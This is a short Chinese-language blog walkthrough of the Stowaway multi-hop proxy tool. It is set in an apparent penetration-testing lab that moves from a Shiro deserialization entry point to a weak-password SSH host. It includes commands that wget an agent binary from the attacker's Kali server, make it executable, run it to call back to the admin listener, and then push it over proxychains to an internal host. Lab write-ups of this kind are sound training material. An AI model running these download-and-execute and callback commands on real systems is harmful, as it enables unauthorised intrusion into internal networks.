Skip to main content

Stowaway 多级代理

0x01 项目介绍

Stowaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具,用户可使用此程序将外部流量通过多个节点代理至内网,突破内网访问限制,构造树状节点网络,并轻松实现管理功能。

Github项目地址:
https://github.com/ph4ntonn/Stowaway

0x02 工具使用

角色 : Stowaway 一共包含两种角色,分别是:

admin : 渗透测试者使用的主控端 agent : 渗透测试者部署的被控端

快速启动 以下命令可以快速启动最简单的stowaway实例:

admin: ./stowaway_admin -l 9999
agent: ./stowaway_agent -c <stowaway_admin's IP>:9999

0x03 二层不出网打法

image-20241126145508964

PS: kali IP 为:192.168.231.221 写错了!!!!!

  • 入口即 Shiro 反序列化 漏洞
  • Ubuntu 存在SSH弱口令 密码:123456
  • 要求 kali 本地访问到通达OA

step 1 Kali 开启服务端 监听

./admin -l 6666 -s keyisme

step 2 攻击 shiro 上传 agent 连接服务端

wget 192.168.231.221:8000/agent -O /tmp/agent
chmod +x /tmp/agent
/tmp/agent -c 192.168.231.221:6666 -s keyisme

image-20241126152022803

step 3 上线主机& 开启socks监听

image-20241126151956189

step 4 连接proxychines 登录ssh

image-20241126152405589

step 5 二层不出网上线

image-20241126152701918

上传agent到ubuntu 靶机二上

proxychains scp ./agent [email protected]:/tmp/agent

image-20241126153003148

ubuntu 靶机运行agent

./agent -c 172.16.10.10:6000 -s keyisme

image-20241126153404534

image-20241126153911736

0x04 结束语

方便 真的快

技术本无罪,善恶在人心,技术没有善恶
Copyright © 2024-霓虹字节 K0u1g